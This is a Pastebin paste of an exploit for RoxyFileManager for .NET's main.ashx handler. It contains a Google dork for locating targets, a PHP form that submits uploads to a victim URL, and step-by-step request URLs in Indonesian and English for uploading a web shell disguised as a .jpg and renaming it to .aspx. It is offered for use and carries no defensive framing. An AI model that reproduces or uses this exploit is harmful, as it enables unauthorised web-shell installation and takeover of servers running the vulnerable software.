Advertisement
rizky07

roxy

Jan 11th, 2020
149
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.26 KB | None | 0 0
  1. # Exploit Title: RoxyFileManager For .NET (main.ashx) - Arbitrary File Upload
  2. # Google Dork: inurl:/fileman/Uploads
  3. # Date: 05-06-2019
  4. # Exploit Author: AkatsuChan - Security Ghost
  5. # Author Homepage: http://www.akatsuchan.zone.id
  6. # Vendor Homepage: http://www.roxyfileman.com
  7. # Software Link: http://www.roxyfileman.com/download
  8. # Version: 1.4.4 or Older (Maybe Work in 1.4.5)
  9. # Tested on: Windows 7
  10.  
  11. description (indonesian):
  12.  
  13. kerentanan terdapat pada file main.ashx, attacker dapat mengupload file menggunakan csrf dan juga dapat memainkn command untuk melihat,mengganti nama,dan memindahkan lokasi file atau dir
  14.  
  15. description (english):
  16.  
  17. the vulnerability in the main.ashx file, attacker can upload files using CSRF and can also play commands to view, rename, and move the location of the file or dir.
  18.  
  19. CSRF :
  20.  
  21. <?php
  22. echo '
  23. <center>
  24. <form method="post">
  25. <select name="array" required>
  26. <option value="files[]">files []</option>
  27. </select>
  28. <input type="text" name="target" size="50" style="width:260px";" placeholder="url http://site.com/bug/vuln.php" style="margin: 5px auto; padding-left: 5px;" required><br>
  29. <input type="submit" name="kunci" value=" Kunci Sasaran!">
  30. </form></center>';
  31. $url = $_POST['target'];
  32. $pf = $_POST['array'];
  33. $terkuncyihh = $_POST['kunci'];
  34. if($terkuncyihh) {
  35. echo "<center><form method='post'
  36. target='_blank' action='$url'
  37. enctype='multipart/form-data'>
  38. <div class='fileUpload btn btn-primary'>Pilih File<input class='upload' type='file' name='$pf'></div>
  39. <input class='fileUpload btn btn-primary ' type='submit' name='g' value='&nbsp;&nbsp;Upload Cok!'></form></center>";
  40. }
  41.  
  42. ?>
  43.  
  44. poc (indonesian) :
  45.  
  46. Pertama Tambahkan Command " ?a=UPLOAD&d=/[path]/fileman/Uploads " pada main.ashx
  47. (ex : site.com/konichiwa/fileman/asp_net/main.ashx?a=UPLOAD&d=/konichiwa/fileman/Uploads )
  48.  
  49. kemudian salin alamat tersebut lalu paste di csrf lalu klik "kunci" pilih shell kalian lalu upload.
  50. ( direkomendasikan menggunakan format .jpg terlebih dahulu lalu ikutin tutorial selanjutnya untuk merubahnya kembali ke format .aspx/.asp )
  51.  
  52. Jika shell.jpg berhasil di upload, kembali ke main.ashx lalu masukan Command ini :
  53. " ?a=MOVEFILE&f=/[path]/fileman/Uploads/shell.jpg&n=/[path]/fileman/Uploads/shell.aspx "
  54. (ex : site.com/konichiwa/fileman/asp_net/main.ashx?a=MOVEFILE&f=/konichiwa/fileman/Uploads/shell.jpg&n=/konichiwa/fileman/Uploads/shell.aspx )
  55. lalu shell.jpg akan berubah menjadi shell.aspx [ hal ini tidak selalu berhasil ]
  56.  
  57. poc (english) :
  58.  
  59. First, add command " ?a=UPLOAD&d=/[path]/fileman/Uploads " on main.ashx
  60. (ex : site.com/konichiwa/fileman/asp_net/main.ashx?a=UPLOAD&d=/konichiwa/fileman/Uploads )
  61.  
  62. second, copy that url to csrf,click "kunci" and select your shell and clic "upload"
  63. ( recomended to use .jpg extension first then follow the next tutorial to change it back to the .aspx / .asp extension )
  64.  
  65. if shell.jpg successfully uploaded, back to main.ashx and add this command :
  66. " ?a=MOVEFILE&f=/[path]/fileman/Uploads/shell.jpg&n=/[path]/fileman/Uploads/shell.aspx "
  67. (ex : site.com/konichiwa/fileman/asp_net/main.ashx?a=MOVEFILE&f=/konichiwa/fileman/Uploads/shell.jpg&n=/konichiwa/fileman/Uploads/shell.aspx )
  68. then shell.jpg will change to shell.aspx [ this doesn't always work ]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement